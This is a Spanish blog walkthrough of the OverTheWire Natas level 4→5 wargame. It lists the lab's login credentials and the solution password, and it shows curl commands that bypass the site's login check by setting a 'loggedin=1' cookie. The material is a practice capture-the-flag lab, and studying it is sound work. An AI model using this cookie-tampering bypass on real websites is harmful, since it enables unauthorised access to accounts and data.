OverTheWire - Natas 4 -> 5 (sin navegador)

August 2022

Información

Las contraseñas cambian cada cierto tiempo, existe la posibilidad de que esta contraseña ya no sea válida

Username: natas5
Password: iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
URL:      http://natas5.natas.labs.overthewire.org

Solución

Primero ejecutamos el comando curl con el parámetro -u para indicar las credenciales.

curl -s -u natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq http://natas5.natas.labs.overthewire.org/

Nos indica que solo los usuarios que tengan sesión iniciada pueden ver la contraseña.

Si agregamos el parámetro -v a curl, podremos ver más información sobre las peticiones.

curl -s -u natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq http://natas5.natas.labs.overthewire.org/ -v

Vemos que existe una cookie llamada loggedin y tiene de valor el número 0.

Para agregar una cookie con el comando curl usamos el parámetro --cookie. En este caso agregaremos --cookie 'loggedin=1'.

curl -u natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq http://natas5.natas.labs.overthewire.org/ --cookie 'loggedin=1'

Contraseña

aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

Anterior

Siguiente

Powered by Soopr   •  Theme  Moonwalk